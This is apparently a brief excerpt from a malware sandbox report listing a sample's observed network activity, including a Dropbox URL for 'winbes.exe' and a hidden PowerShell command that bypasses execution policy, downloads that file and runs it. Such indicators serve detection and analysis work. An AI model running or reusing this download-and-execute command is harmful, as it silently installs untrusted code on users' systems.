Technical Information
- https://www.dropbox.com/s/fnmqt1kqrazm3uk/winbes.exe?dl=1 as winbes.exe
- 'dr##box.com':443
- 'dr##box.com':443
- DNS ASK dr##box.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://www.dropbox.com/s/fnmqt1kqrazm3uk/winbes.exe?dl=1','winbes.exe'); Start-Process winbes.exe' (with hidden window)